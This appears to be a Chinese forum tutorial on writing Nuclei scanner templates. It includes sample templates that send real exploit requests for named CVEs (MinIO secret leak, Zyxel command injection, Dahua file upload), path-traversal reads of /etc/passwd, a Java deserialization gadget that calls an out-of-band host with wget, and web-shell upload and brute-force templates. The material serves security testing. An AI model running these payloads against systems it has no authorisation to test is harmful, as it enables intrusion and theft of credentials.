发布于3月7日3月7日 Members 一、脚本的语法格式 大小写敏感 缩进:使用缩进表示层级关系,YAML 使用空格进行缩进,通常每个缩进级别为两个空格。 键值对:YAML 通过键值对来存储数据,键和值之间用冒号 : 分隔。 列表:使用短横线 -来表示列表中的项。 注释:以 # 开头的行是注释。 字符串:字符串可以不使用引号,也可以使用单引号或双引号 id不能有中文、特殊字符、--以及空格等内容,id这个参数,您可以理解为是输出的标题,一个简单易懂的ID,可以让您更快的判断出 info:信息块,名称 、 作者 、 严重性 、 描述 、参考和 标签 ,这些都属于信息块的范围,一般情况下,我们只需要写入名称、作者、严重性、描述、标签这几项即可 name:模板名称,这个建议跟id相同即可 severity:严重性,这里不可以使用中文,一般用critical、hight、Medium、info来表示威胁等级 description:漏洞介绍,这里可以使用中文,也不限制特殊字符,一般是用来做漏洞介绍用的,可以方便使用者了解该漏洞的具体说明 tags:标签,是为了给漏洞加一个标签,方便进行统一扫描,例如:tags: seeyon(切记不要用中文哈) 日常编写nuclei的yaml脚本,nuclei内置cookie-reuse属性,在发起多个请求时,需要保持会话,可以添加cookie-reuse: true来保持多个请求时会话得到保持,这在有身份验证时很有用。 如果匹配失败的话可以使用-debug来获取请求包和返回包进行调试,使用Burp抓包直接将请求包内容粘贴即可 二、Nuclei常用命令 1.验证模板格式 nuclei -t test.yaml --validate 2.指定模板和目标 nuclei -t test.yaml -u http://exam.com 3.批量扫描 nuclei -t test.yaml -l target.txt 4.指定socks5代理扫描 nuclei -t test.yaml -u http://exam.com -p socks5://127.0.0.1:7890 三、脚本示例 id: file-include #模板的唯一标识符 info: #包含模板的基本信息,如名称、作者、版本等 name: file include #脚本的名字 author: bakclion #模板作者 severity: high #安全级别 可选的有 info, low, medium, high, critical, unknown description: 用于测试靶场的nuclei模板 #描述模板内容 reference: http://www.baidu.com #参考来源 tags: test #分类的标签 requests: #定义了如何与目标进行交互的请求部分 - method: GET #HTTP 方法,如 GET 或 POST path: #请求的路径 - "{{BaseURL}}/vul/dir/dir_list.php?title=../../../../../../../etc/passwd" headers: #请求头 User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" matchers: - type: status #匹配回包状态 status: - 200 - type: regex #匹配返回内容 part: body regex: - "root:x:0:0:root:/root:/bin/bash" 四、脚本组成 1.开头 id: landray-oa-fileread info: name: landray-oa-fileread author: backlion severity: high description: | 蓝凌OA custom.jsp 任意文件读取漏洞,这个OA遇到的比较少 FOFA: app="Landray-OA系统" reference: https://github.com/backslion tags: fileread,landray 2.请求 Get requests: - method: GET path: - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties" POST requests: - method: POST path: - "{{BaseURL}}/sys/ui/extend/varkind/custom.jsp" headers: Content-Type: application/x-www-form-urlencoded body: 'var={"body":{"file":"file:///etc/passwd"}}' RAW requests: - raw: - | POST /ispirit/interface/gateway.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../mysql5/my.ini"} 跳转 - method: GET path: - "{{BaseURL}}" redirects: true max-redirects: 2 或者 requests: - raw: - | GET /zentao/api-getModel-editor-save-filePath=bote HTTP/1.1 redirects: true max-redirects: 3 路径 请求的下一部分是请求的路径。动态变量可以放置在路径中以在运行时修改其行为。变量以开头{{和}}结尾并且区分大小写。 {{Hostname}}:这是一个常用的保留字,表示主机名。 {{randstr}}:这是一个随机字符串。 {{rand_int(1,9999)}}:这是一个生成 1 到 9999 之间随机整数的保留字。 {{BaseURL}}:表示完整的基本 URL,例如 https://example.com:443/foo/bar.php。 {{RootURL}}:表示不包含路径和文件的基本 URL,例如 https://example.com:443。 {{Host}}:表示主机名,例如 example.com。 {{Port}}:表示端口号,例如 443。 {{Path}}:表示路径,例如 /seeyon/login。 {{File}}:表示文件名,例如 bar.php。 {{Scheme}}:表示协议,例如 https。 {{hex_decode("")}}:这是一个十六进制解码的保留字。 md5():这是一个 MD5 转换的保留字 Variable Value {{BaseURL}} https://example.com:443/foo/bar.php {{RootURL}} https://example.com:443 {{Hostname}} example.com:443 {{Host}} example.com {{Port}} 443 {{Path}} /foo {{File}} bar.php {{Scheme}} https stop-at-first-match 大意就是一个模板里有多个扫描路径,当第一个命中时,自动停止后面几个路径的扫描,当然这个不会影响其他模板. requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/login" - "{{BaseURL}}/main" - "{{BaseURL}}/index" stop-at-first-match: true OOB 自 Nuclei v2.3.6 发行以来,Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描。就像 {{interactsh-url}} 在请求中的任何位置编写并为添加匹配器一样简单 interact_protocol。Nuclei 将处理交互作用与模板的相关性,以及通过允许轻松进行 OOB 扫描而生成的请求的相关性。 requests: - raw: - | GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} JAVA反序列化 raw: - | POST /index.faces;jsessionid=x HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 1882 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded javax.faces.ViewState={{generate_java_gadget("commons_collection3.1", "nslookup {{interact.sh}}", "base64")}} 3.匹配器 matchers-condition: and #对多个匹配器的匹配结果进行逻辑运算:and|or,AND是同时满足条件 matchers: - type: dsl #匹配器类型 <status|word|size|binary|regex|dsl> dsl: #使用 DSL 语法进行数据匹配(!注:更加灵活,复杂匹配,推荐使用) <StringSlice> - "status_code_1 == 200 && status_code_2 == 302" - 'all_headers_1 == "admin" && all_headers_2 == "index"' condition: and #需要同时满足上面两个条件 - type: word words: #返回包匹配文本(!!!注:word类型此处较为特殊,需要使用words做匹配项录入) <StringSlice> - "admin.php" - "61646d696e2e706870" - "{{match_str}}" encoding: hex #编码器,对返回提取数据进行编码后对word内容进行匹配(!!!注:仅支持word匹配器,暂仅只支持hex) <hex> #以下设置,基本通用(!!!注:除dsl类型) part: header #读取返回数据的区域 <header|body|无设置代表全匹配|interactsh_protocol|interactsh_request(!注:dnslog服务器返回数据,需要在发包中配合{{interactsh-url}}使用> condition: or #匹配结果逻辑运算 <and|or> negative: true #对匹配结果进行取反操作,结合condition可实现更为灵活的组合方式 <true|false> - type: status status: #与匹配器类型一致,当前为返回包状态码 <intSlice>,200或302 - 200 - type: regex regex: #使用正则进行数据匹配 <StringSlice> - '.*\admin.php.*' - type: binary binary: #使用二进制进行数据匹配 <StringSlice> - "61646d696e2e706870" - type: size size: #返回包数据大小(注:通指body数据) <intSlice> - 1234 dsl 一般用于复杂的逻辑判断,其中包含以下内置函数。 变量名描述例子输出数据 content_length 内容长度标头 content_length 12345 status_code 响应状态代码 status_code 200 all_headers 返回 header 信息 body 返回 body 信息 body_1 header_name 返回 header 的 key value 信息,全小写,且-替换为_ user_agent xxxx header_name 返回 header 的 key value 信息,全小写,且-替换为_ set_cookie xxx=xxxx raw 原始的返回信息(标头+响应) raw duration 请求响应时间 duration 5 如: #检查响应的大小是否大于1000字节 matchers: - size: ">1000" #匹配包含 “error” 关键词的响应 matchers: - word: "error" #匹配响应中的版本号: matchers: - regex: "Version: (\\d+\\.\\d+\\.\\d+)" #如果期望响应的前两个字节是 0x01 0x02: matchers: - binary: "0102" #匹配 HTTP 响应码为 200 的情况: matchers: - dsl: "response_code == 200" 4.Session 在发起多个请求时,需要保持会话,可以添加cookie-reuse: true来保持多个请求时会话得到保持,这在有身份验证时很有用。 # cookie-reuse accepts boolean input and false as default cookie-reuse: true 4.提取器 #提取器,对返回数据进行提取,用于再利用及发送至控制台进行显示或使用,语法与匹配器相似 extractors: - type: regex #提取器类型 <regex|json|kval|xpath|dsl> regex: #使用regex语法进行数据提取(!注:推荐使用) <StringSlice> - "token:(.*) " group: 1 #特定regex使用,0是完全匹配,1-N为获取分组数据(!!!注:注意长度须符合正则分组长度) <Int> #以下设置,基本通用 part: body #设置提取数据的区域 <header|body|无设置代表全匹配|interactsh_protocol|interactsh_request(!注:dnslog服务器返回数据,需要在发包中配合{{interactsh-url}}使用> name: token #设置当前提取数据存储变量名 <String> internal: true #设置将提取器用作动态变量,防止发送控制台后变量清空 <true|false> - type: json json: #基于 JSON 的响应中提取数据 <StringSlice> - ".token" - type: kval kval: #从响应标头/Cookie 中提取key: value/key=value格式化数据(!!!注:kval提取器不接受破折号-作为输入,必须替换为下划线_) <StringSlice> - "set_cookie" - "PHPSESSID" - type: xpath xpath: #从 HTML 响应中提取基于 xpath 的数据 <StringSlice> - "/html/body/div/p[2]/a" attribute: href #特定xpath使用,要提取的属性值,可选 - type: dsl dsl: #使用 DSL 表达式从响应中提取数据 - "len(body) 如: extractors: - regex: #正则表达式提取 pattern: "Version: (\\d+\\.\\d+\\.\\d+)" target: version extractors:#json提取 - json: path: .user.name target: username extractors:#xpath提取 - xpath: expression: //img/@src target: image_url 5.Nuclei 内置函数 辅助函数 描述 例子 输出数据 base64(src interface{}) string Base64 对字符串进行编码 base64("Hello") SGVsbG8= base64_decode(src interface{}) []byte Base64 对字符串进行解码 base64_decode("SGVsbG8=") [72 101 108 108 111] base64_py(src interface{}) string 像 python 一样将字符串编码为 base64(带有新行) base64_py("Hello") SGVsbG8=\n concat(arguments …interface{}) string 连接给定数量的参数以形成一个字符串 concat("Hello", 123, "world) Hello123world compare_versions(versionToCheck string, constraints …string) bool 将第一个版本参数与提供的约束进行比较 compare_versions('v1.0.0', '>v0.0.1', '<v1.0.1') true contains(input, substring interface{}) bool 验证字符串是否包含子字符串 contains("Hello", "lo") true generate_java_gadget(gadget, cmd, encoding interface{}) string 生成 Java 反序列化小工具 generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}", "base64") gzip(input string) string 使用 GZip 压缩输入 gzip("Hello") gzip_decode(input string) string 使用 GZip 解压缩输入 gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000")) Hello zlib(input string) string 使用 Zlib 压缩输入 zlib("Hello") zlib_decode(input string) string 使用 Zlib 解压缩输入 zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5")) Hello date(input string) string 返回格式化的日期字符串 date("%Y-%M-%D") 2022-05-01 time(input string) string 返回格式化的时间字符串 time("%H-%M") 22-12 timetostring(input int) string 返回格式化的 unix 时间字符串 timetostring(1647861438) 2022-03-21 16:47:18 +0530 IST hex_decode(input interface{}) []byte 十六进制解码给定的输入 hex_decode("6161") aa hex_encode(input interface{}) string 十六进制编码给定的输入 hex_encode("aa") 6161 html_escape(input interface{}) string HTML 转义给定的输入 html_escape("test") test html_unescape(input interface{}) string HTML 取消转义给定的输入 html_unescape("<body>test</body>") test len(arg interface{}) int 返回输入的长度 len("Hello") 5 md5(input interface{}) string 计算输入的 MD5(消息摘要)哈希 md5("Hello") 8b1a9953c4611296a827abf8c47804d7 mmh3(input interface{}) string 计算输入的 MMH3 (MurmurHash3) 哈希 mmh3("Hello") 316307400 print_debug(args …interface{}) 打印给定输入或表达式的值。用于调试。 print_debug(1+2, "Hello") [INF] print_debug value: [3 Hello] rand_base(length uint, optionalCharSet string) string 从可选字符集生成给定长度字符串的随机序列(默认为字母和数字) rand_base(5, "abc") caccb rand_char(optionalCharSet string) string 从可选字符集中生成随机字符(默认为字母和数字) rand_char("abc") a rand_int(optionalMin, optionalMax uint) int 在给定的可选限制之间生成一个随机整数(默认为 0 - MaxInt32) rand_int(1, 10) 6 rand_text_alpha(length uint, optionalBadChars string) string 生成给定长度的随机字母字符串,不包括可选的割集字符 rand_text_alpha(10, "abc") WKozhjJWlJ rand_text_alphanumeric(length uint, optionalBadChars string) string 生成一个给定长度的随机字母数字字符串,没有可选的割集字符 rand_text_alphanumeric(10, "ab12") NthI0IiY8r rand_text_numeric(length uint, optionalBadNumbers string) string 生成给定长度的随机数字字符串,没有可选的不需要的数字集 rand_text_numeric(10, 123) 0654087985 regex(pattern, input string) bool 针对输入字符串测试给定的正则表达式 regex("H([a-z]+)o", "Hello") true remove_bad_chars(input, cutset interface{}) string 从输入中删除所需的字符 remove_bad_chars("abcd", "bc") ad repeat(str string, count uint) string 重复输入字符串给定的次数 repeat("../", 5) ../../../../../ replace(str, old, new string) string 替换给定输入中的给定子字符串 replace("Hello", "He", "Ha") Hallo replace_regex(source, regex, replacement string) string 替换与输入中给定正则表达式匹配的子字符串 replace_regex("He123llo", "(\\d+)", "") Hello reverse(input string) string 反转给定的输入 reverse("abc") cba sha1(input interface{}) string 计算输入的 SHA1(安全哈希 1)哈希 sha1("Hello") f7ff9e8 sha256(input interface{}) string 计算输入的 SHA256(安全哈希 256)哈希 sha256("Hello") 185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969 to_lower(input string) string 将输入转换为小写字符 to_lower("HELLO") hello to_upper(input string) string 将输入转换为大写字符 to_upper("hello") HELLO trim(input, cutset string) string 返回一个输入切片,其中包含在 cutset 中的所有前导和尾随 Unicode 代码点都已删除 trim("aaaHelloddd", "ad") Hello trim_left(input, cutset string) string 返回一个输入切片,其中包含在 cutset 中的所有前导 Unicode 代码点都已删除 trim_left("aaaHelloddd", "ad") Helloddd trim_prefix(input, prefix string) string 返回没有提供的前导前缀字符串的输入 trim_prefix("aaHelloaa", "aa") Helloaa trim_right(input, cutset string) string 返回一个字符串,其中包含在 cutset 中的所有尾随 Unicode 代码点都已删除 trim_right("aaaHelloddd", "ad") aaaHello trim_space(input string) string 返回一个字符串,删除所有前导和尾随空格,由 Unicode 定义 trim_space(" Hello ") “Hello” trim_suffix(input, suffix string) string 返回没有提供的尾随后缀字符串的输入 trim_suffix("aaHelloaa", "aa") aaHello unix_time(optionalSeconds uint) float64 返回当前 Unix 时间(自 1970 年 1 月 1 日 UTC 以来经过的秒数)以及添加的可选秒数 unix_time(10) 1639568278 url_decode(input string) string URL 解码输入字符串 url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1") url_encode(input string) string URL 对输入字符串进行编码 url_encode("https://test.com?id=1") wait_for(seconds uint) 暂停执行给定的秒数 wait_for(10) true to_number(input string) float64 将数字型字符串转换为 float64 类型 to_number("123456") 123456 to_string(input interface{}) string 将数据转换为字符串类型 to_string(123456) “123456” rand_ip(input string) 根据输入网段随机返回一个 ip 地址 rand_ip("192.168.1.1/24") 五、脚本案例 id: CVE-2023-28432 info: name: MinIO集群模式信息泄露漏洞 author: kecy severity: medium description: | MinIO是一个开源对象存储系统。在其RELEASE.2023-03-20T20-16-18Z版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。 reference: - https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md tags: minio,cve,cve2023 http: - raw: - | POST /minio/bootstrap/v1/verify HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 0 matchers-condition: and matchers: - type: word part: body words: - 'MINIO_SECRET_KEY' - 'MINIO_ROOT_PASSWORD' condition: and - type: status status: - 200 id: CVE-2022-30525 info: name: Zyxel 防火墙未经身份验证的远程命令注入 author: kecy severity: high description: | CVE-2022-30525中,Zyxel防火墙版本的CGI程序中,由于对某些传入的特殊数据处理存在错误,攻击者在未经身份验证的情况下通过构造恶意数据进行系统命令注入攻击,修改特定文件,最终执行任意代码。 reference: - https://blog.csdn.net/weixin_43080961/article/details/124776553 tags: Zyxel,cve,cve2022 http: - raw: - | POST /ztp/cgi-bin/handler HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Content-Type: application/json Connection: close {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exploit}}","data":"hi"} payloads: exploit: - ";ping -c 3 {{interactsh-url}};" matchers: - type: word part: interactsh_protocol name: dns words: - "dns" id: CVE-2023-3836 #模板的唯一标识符 info: #模板的基本信息 name: Dahua Smart Park Management - Arbitrary File Upload #模板的名称 author: HuTa0 #模板作者名 severity: critical #漏洞的严重程度 description: | #漏洞的详细描述 Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. remediation: | #修复建议,可以不写 Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: #漏洞相关的参考链接 - https://github.com/qiuhuihk/cve/blob/main/upload.md - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - https://vuldb.com/?ctiid.235162 - https://vuldb.com/?id.235162 classification: #漏洞的分类信息,包括CVSS评分、CVE-ID、CWE-ID等 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3836 cwe-id: CWE-434 epss-score: 0.04304 epss-percentile: 0.91215 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: #额外的元数据信息 verified: true max-request: 2 vendor: dahuasecurity product: smart_parking_management shodan-query: html:"/WPMS/asset" zoomeye-query: /WPMS/asset tags: cve,cve2023,dahua,fileupload,intrusive,rce #模板的标签 variables: random_str: "{{rand_base(6)}}" #生成一个随机的6位字符串 match_str: "{{md5(random_str)}}" #对生成的随机字符串进行MD5哈希,以便在后续请求中进行匹配 http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" Content-Type: application/octet-stream Content-Transfer-Encoding: binary {{match_str}} --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} matchers:#匹配器 - type: dsl #dsl: 定义了两个DSL匹配条件,要求两个条件都必须满足(使用condition: and) dsl: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{match_str}}')" condition: and extractors: #提取器 - type: regex #使用正则表达式进行提取 name: shell_filename #提取的名称,内部使用 internal: true part: body_1 #提取响应的哪个部分,这里是body_1(第一个请求的响应体) regex: - 'ico_res_(\w+)_on\.jsp' #提取规则,这里是正则表达式'ico_res_(\w+)_on\.jsp' 六、典型场景 1.命令执行 id: remote-command-execution #模板的唯一标识符 info: #包含关于模板的基本信息 name: Remote Command Execution #模板的名称 author: backlion #模板作者的名称 severity: critical #漏洞的严重程度 description: | ##描述模板内容 默默存在远程命令执行漏洞 FOFA: app="Landray-OA系统" reference: https://github.com/backslion #参考来源 tags: rce, remote, command, execution #标签,用于标记模板的类型或用途 requests: #定义了用于测试的HTTP请求,这里可以用http代替 - raw: #原始HTTP请求数据 - | POST /vulnerable-endpoint HTTP/1.1 #请求方法和URL Host: {{Hostname}} #目标主机名 Content-Type: application/x-www-form-urlencoded Content-Length: 50 cmd=whoami matchers: #定义了如何判断响应是否表示漏洞存在 - type: word #匹配规则为关键字 words: #响应中预期包含的关键词 - "root" - "admin" - "user" part: body # 检查响应的body extractors: #定义了如何从响应中提取有用的信息 - type: regex #提取正则表达式 regex: #用于匹配响应中有用信息的正则表达式,比如root|admin|user - "root|admin|user" part: body #从响应的哪个部分提取信息,这里是body(响应体) 批量检查: nuclei -t rce-template.yaml -l url.txt 2.sql延时注入 id: sql-time-based-injection info: name: SQL Time-Based Injection author: bakclion severity: high tags: sql, sqli, time-based, injection requests: - raw: - | GET /vulnerable-endpoint?id=1%20AND%20IF(1=1,SLEEP(5),0) HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - response.time > 5000 - raw: - | GET /vulnerable-endpoint?id=1%20AND%20IF(1=2,SLEEP(5),0) HTTP/1.1 Host: {{Hostname}} matchers: #匹配器的类型,这里是dsl - type: dsl #自定义匹配规则,通过DSL(领域特定语言)来描述匹配逻辑 dsl: - response.time < 5000 3.任意文件读取 id: arbitrary-file-read info: name: Arbitrary File Read author: backlion severity: high tags: file-read, lfi, rfi, arbitrary-read requests: - raw: - | GET /vulnerable-endpoint?file=/etc/passwd HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "root:x:0:0:" # /etc/passwd中典型的root用户行 part: body - raw: - | GET /vulnerable-endpoint?file=C:\Windows\System32\drivers\etc\hosts HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "127.0.0.1" # Windows hosts文件中典型的内容 part: body 4.跨站脚本攻击 id: reflected-xss info: name: Reflected Cross-Site Scripting author: backlion severity: high tags: xss, reflected requests: - raw: - | GET /vulnerable-endpoint?input=<script>alert('XSS')</script> HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "<script>alert('XSS')</script>" part: body - raw: - | GET /vulnerable-endpoint?input=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "<script>alert('XSS')</script>" part: body 5.反序化 id: deserialization-vulnerability info: name: Deserialization Vulnerability author: backlion severity: high tags: deserialization, rce requests: - raw: - | POST /vulnerable-endpoint HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-java-serialized-object Content-Length: 112 rO0ABXNyABNqYXZhLnV0aWwuSGFzaE1hcBv7h1vlAAAAAAFMAARrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAAR2YWx1ZXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hyABFqYXZhLmxhbmcuSGFzaE1hcBVzRlfdMzNFwAIAAUwABGNsb2NrSABMTGphdmEvbGFuZy9DbG9jaztMABBtYXBfZXhwbG9yZXJ0ABBMamF2YS91dGlsL01hcDt4cHcEAAAAAHh0ABR3b3Jrc0ZpbmUAAA== # This is a simple example payload matchers: - type: word words: - "java.util.HashMap" part: body - raw: - | POST /vulnerable-endpoint HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-java-serialized-object Content-Length: 116 rO0ABXNyABFqYXZhLnV0aWwuQXJyYXlMaXN0JTDnUphBOwGAAeEdAAZpblRhbmxlUgxBZXguU3lzdGVtcxkAAA0BAAF4cHcEAAAAAHhxAH4AAQ== # This is another example payload matchers: - type: word words: - "java.util.ArrayList" part: body 6.文件上传 id: file-upload-php-execution info: name: File Upload and PHP Execution Vulnerability author: backlion severity: critical tags: file-upload, php, execution requests: - raw: - | POST /vulnerable-endpoint HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 251 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/x-php <?php echo 'Vulnerable'; unlink(__FILE__); ?> ------WebKitFormBoundary7MA4YWxkTrZu0gW-- matchers: - type: word words: - "File uploaded successfully" part: body - raw: - | GET /uploads/shell.php HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "Vulnerable" part: body 也可以用: <?php echo md5('漏洞编号');unlink(__FILE__); ?> 7.弱密码 id: weak-password-dictionary info: name: Weak Password Detection with Dictionary author: backlion severity: high tags: weak-password, authentication, login requests: - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded payloads: usernames: "{{usernames.txt}}" passwords: "{{passwords.txt}}" matchers-condition: and matchers: - type: word words: - "Welcome" - "Dashboard" part: body attack: pitchfork generators: - name: username type: template templates: - "{{usernames}}" - name: password type: template templates: - "{{passwords}}" request: - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: {{len "username=admin&password=admin"}} username={{username}}&password={{password}}
参与讨论
你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。
注意:你的帖子需要版主批准后才能看到。